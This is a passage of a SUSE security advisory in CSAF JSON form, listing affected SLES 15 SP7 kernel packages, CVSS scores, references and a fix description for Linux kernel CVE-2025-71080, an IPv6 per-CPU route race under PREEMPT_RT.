"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-71079"
},
{
"cve": "CVE-2025-71080",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71080"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: fix a BUG in rt6_get_pcpu_route() under PREEMPT_RT\n\nOn PREEMPT_RT kernels, after rt6_get_pcpu_route() returns NULL, the\ncurrent task can be preempted. Another task running on the same CPU\nmay then execute rt6_make_pcpu_route() and successfully install a\npcpu_rt entry. When the first task resumes execution, its cmpxchg()\nin rt6_make_pcpu_route() will fail because rt6i_pcpu is no longer\nNULL, triggering the BUG_ON(prev). It\u0027s easy to reproduce it by adding\nmdelay() after rt6_get_pcpu_route().\n\nUsing preempt_disable/enable is not appropriate here because\nip6_rt_pcpu_alloc() may sleep.\n\nFix this by handling the cmpxchg() failure gracefully on PREEMPT_RT:\nfree our allocation and return the existing pcpu_rt installed by\nanother task. The BUG_ON is replaced by WARN_ON_ONCE for non-PREEMPT_RT\nkernels where such races should not occur.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71080",
"url": "https://www.suse.com/security/cve/CVE-2025-71080"
},
{
"category": "external",
"summary": "SUSE Bug 1256608 for CVE-2025-71080",
"url": "https://bugzilla.suse.com/1256608"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.6,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
